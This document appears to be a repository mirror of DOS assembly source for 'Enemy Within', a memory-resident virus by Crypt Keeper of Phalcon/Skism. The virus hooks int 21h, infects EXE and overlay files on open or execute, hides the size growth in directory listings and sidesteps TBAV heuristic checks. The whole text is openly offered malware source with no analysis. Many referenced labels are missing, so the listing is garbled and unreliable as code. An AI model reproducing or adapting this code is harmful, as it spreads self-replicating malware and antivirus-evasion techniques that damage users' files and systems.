mirror of
synced 2025-02-01 06:47:28 +00:00
438 lines
13 KiB
438 lines
13 KiB
; [Enemy Within] v1.00 by Crypt Keeper -Phalcon/Skism-
; Enemy Within is a memory resident virus that infects EXE and overlay files
; with directory size increases hidden. I'll be using this as a base for
; future more advanced viruses.
; Enemy Within infects EXEs and overlays on file Open, Get/Set
; attributes, and execute.
; .COM file can be executed with no modifications
.model tiny
org 100h ;make this a com file
vlength equ vbot-offset(enemy_within) ;Virus length in bytes
heapsiz equ hbot-htop ;size of heap data in bytes
ressize equ 1024/16 ;Virus size resident
virusid equ 08AC5h ;Virus ID word in EXE header
chkfunc equ 0FFFEh ;Check resident function for int 21h
push ds es ;save startup registers
db 0BDh ;mov bp,
delta dw 0 ;delta offset
xor ax,ax
dec ax
dec ax ;AX=FFFE (check resident function)
int 21h ;check if virus is resident
inc ax ;is virus resident (zero if yes)
jz return ;if so, don't install
;Microsoft Windows/Desqview compatable load resident routine
mov bx,ressize ;amount of memory to request
mov ah,48h ;allocate memory
int 21h
jc not_enough_memory ;carry set means allocation error
mov es,ax ;ax=segment of allocated memory
dec ax
mov ds,ax ;segment of MCB for memory
mov word ptr ds:[01h],08h ;set memory block as independant
jmp short memory_allocation_complete
pop ax
push ax ;get PSP value off stack
mov es,ax ;ES=PSP for set memory block size
dec ax
mov ds,ax ;get segment of this program's MCB
mov bx,word ptr ds:[03h] ;get size of current block
dec bx ;decrease size of memory block
mov ah,4Ah ;set memory block size
int 21h
jc return ;return if allocation error
jmp short install ;try to allocate again
push cs
pop ds
push es ;save found target segment
mov ax,3521h ;get int 21h vector
int 21h
mov [bp+offset(i21vecs)],es
mov [bp+offset(i21veco)],bx
pop es
mov cx,(vlength+heapsiz+1)/2 ;words to move
mov di,100h ;destination in memory
lea si,[bp+offset(enemy_within)] ;source of viral code
rep movsw ;copy ourselves up there
push es
pop ds ;segment to set int vector
mov dx,offset(i21vec) ;int 21h vector
mov ax,2621h ;set int 21h vector
dec ah ;without setting off mem resident
int 21h ;code heuristic flags
return: pop bx ;segment of PSP
mov es,bx
add bx,16 ;compensate for PSP size
add cs:[bp+offset(old_cs)],bx ;add PSP to initial CS
pop ds ;restore old DS register
cli ;clear interrupt enable flag
mov ax,cs:[bp+offset(old_ss)] ;old SS register
add ax,bx ;add PSP adress
mov ss,ax
db 0BCh ;mov sp,
old_sp dw 0 ;old stack pointer
sti ;set interrupt enable flag
jmp dword ptr cs:[bp+offset(old_ip)] ;jump to original EXE code
vname db '[Enemy Within] Crypt Keeper - Phalcon/Skism'
old_ip dw 0
old_cs dw 0FFF0h ;Old CS:IP
old_ss dw 0FFF0h ;old stack segment
i21vec: cmp ax,chkfunc ;check resident function?
jne no_check_func
inc ax ;increment AX
iret ;return from interrupt
inc ah ;avoid execute intercept heuristic flags
cmp ax,4C00h ;load and execute program?
je _infect_on_exec
cmp ax,4C01h ;load program?
je _infect_on_exec
cmp ax,4C03h ;load overlay?
je _infect_on_exec
dec ah ;return AX to normal
cmp ah,3Dh ;open file with handle?
je _infect_on_open
cmp ax,4300h ;get file attributes?
je _infect_on_open
cmp ax,4301h ;set file attributes?
je _infect_on_open
cmp ah,11h ;find first file (FCB)?
je FCB_dir_stealth
cmp ah,12h ;find next file (FCB)?
je FCB_dir_stealth
cmp ah,4Eh ;find first file (DTA)?
je DTA_dir_stealth
cmp ah,4Fh ;find next file (DTA)?
je DTA_dir_stealth
jmp dword ptr cs:i21veco ;execute rest of interrupt chain
dec ah ;return AX to normal
jmp infect_file ;and attempt to infect
call function ;go ahead and execute
push dx cx bx es ax ;push all used registers
test al,al ;was find successful?
jnz exit_interrupt_stealth
mov ah,51h ;Get PSP address
int 21h
mov es,bx ;ES=PSP address
sub bx,word ptr es:[16h] ;parent PSP?
jnz exit_interrupt_stealth
mov bx,dx
mov al,byte ptr [bx] ;first byte of FCB
push ax
mov ah,2Fh ;get DTA adress
int 21h
pop ax
inc al
jnz checkFCBinfected ;extended FCB?
add bx,007h ;If so, make into normal
mov ax,word ptr es:[bx+17h]
mov cx,word ptr es:[bx+19h] ;Get time and date
call unmask ;unmask second and date
xor ax,cx ;file infected?
jnz exit_interrupt_stealth ;exit stealth interrupt
sub word ptr es:[bx+01Dh],vlength
sbb word ptr es:[bx+01Fh],ax ;subtract virus size
pop ax es bx cx dx
popf ;pop all used registers
retf 02h ;return with given flags
unmask: and ax,1Fh
and cx,1Fh
dec cx ;unmask seconds and date
DTA_dir_stealth: ;DTA directory size subtract
call function ;go ahead and execute
jc exit_interrupt_stealthvec ;exit if function unsuccessful
push dx cx bx es ax ;push all used registers
mov ah,2Fh ;get DTA adress
int 21h
mov ax,word ptr es:[bx+16h]
mov cx,word ptr es:[bx+18h] ;get time and date stamps
call unmask ;unmask date and seconds
xor ax,cx ;is file infected?
jnz exit_interrupt_stealth ;if not, don't subtract size
sub word ptr es:[bx+1Ah],vlength
sbb word ptr es:[bx+1Ch],ax ;subtract virus size in bytes
jmp short exit_interrupt_stealth
xor cx,cx
cwd ;zero cx and dx
mov ax,4202h ;move pointer from EOF
call dword ptr cs:i21veco ;simulate call to original int 21h
open_readwrite: ;opens file at DS:DX for read/write
mov ax,3D00h ;open for read only access
call function
jc bad_open ;carry set means open error
push cs
pop ds
push ax ;file handle
mov bx,ax
mov ax,1220h ;get JFT entry
int 2Fh
mov ax,1216h ;get SFT location
mov bl,byte ptr es:[di] ;handle number
int 2Fh
pop bx
mov word ptr es:[di+02h],2 ;set file for read/write
pop ax
jmp short exit_infect ;exit if bad open
push ax si es di bx cx ds dx ;push all used registers
call open_readwrite ;open file for read/write access
mov cx,24 ;24 bytes of header to read
mov dx,offset(exeheader) ;EXE header information
mov ah,3Fh ;read file or device
int 21h
cmp cx,ax ;enough bytes read?
jne bad_file ;if not, file too small
mov cx,exeid
not cx ;check whether EXE file without
cmp cx,0B2A5h ;tripping TBAV's check com/exe
je disease_exe ;heuristic flag
cmp cx,0A5B2h
je disease_exe ;if MZ or ZM, go ahead and infect
mov ah,3Eh ;close file with handle
int 21h
pop dx ds cx bx di es si ax ;pop all used registers
jmp exit_interrupt_chained ;execute rest of interrupt chain
cmp chksum,virusid ;file already infected?
je bad_file ;if so, bad file
lds si,dword ptr es:[di+0Dh] ;get old file date and time
push si ds ;and save
push cs
pop ds
add minallc,ressize ;add virus size in paragraphs
push es ;save SFT segment
les si,dword ptr ds:initss ;get initial SS:SP (reversed)
mov old_ss,si
mov old_sp,es
les si,dword ptr ds:initip ;get initial CS:IP
mov old_cs,es
mov old_ip,si
pop es
call move_pointer_end ;move file pointer to end of file
mov cx,16
div cx ;convert file size to seg:offset
sub ax,headers ;subtract header size from segment
mov initcs,ax
mov initip,dx ;set initial cs:ip
sub dx,100h
mov delta,dx ;set delta offset in virus code
add dx,offset(sspace)+64+100h
mov initsp,dx
mov initss,ax ;set initial SS:SP in exe header
mov chksum,virusid ;set file as already infected
mov dx,100h ;offset of virus code in memory
mov cx,vlength ;length of virus code
mov ah,40h ;write file or device
push ax
int 21h
call move_pointer_end ;get file size
mov cx,512
div cx ;convert to pages
test dx,dx ;no remainder?
jz no_remainder
inc ax ;if remainder add another page
mov expages,ax
mov exbytes,dx ;set new exe size
mov word ptr es:[di+15h],dx
mov word ptr es:[di+17h],dx ;zero file pointer in SFT
mov dx,offset(exeheader) ;exe header information
mov cx,24 ;24 bytes to change
pop ax ;write file or device
int 21h
pop dx cx ;old file date/time
push dx ;save original file date
and cx,-20h ;reset seconds
and dx,1Fh
dec dx ;unmask date field
or cx,dx ;seconds=date
pop dx ;restore old date
mov ax,5701h ;set file date and time
int 21h
jmp bad_file ;close and exit
vbot equ $ ;bottom of virus code
htop equ $ ;top of heap
i21veco dw 0
i21vecs dw 0 ;old int 21h vector
exeid dw 0 ;Unchanged ;EXE signature
exbytes dw 0 ;number of bytes in last page
expages dw 0 ;number of pages in file
reloci dw 0 ;Unchanged ;number of items in relocation table
headers dw 0 ;Unchanged ;size of header in paragraphs
minallc dw 0 ;minimum memory to be allocated
maxallc dw 0 ;Unchanged ;maximum memory to be allocated
initss dw 0 ;initial SS value
initsp dw 0 ;initial SP value (used as ID word)
chksum dw 0 ;complimented checksum
initip dw 0 ;initial IP value
initcs dw 0 ;initial CS value
reltabl dw 0 ;Unchanged ;byte offset to relocation table
ovnum dw 0 ;Unchanged ;overlay number
hbot equ $ ;bottom of heap data
sspace db 70 dup (0) ;virus stack
end enemy_within ;end of virus code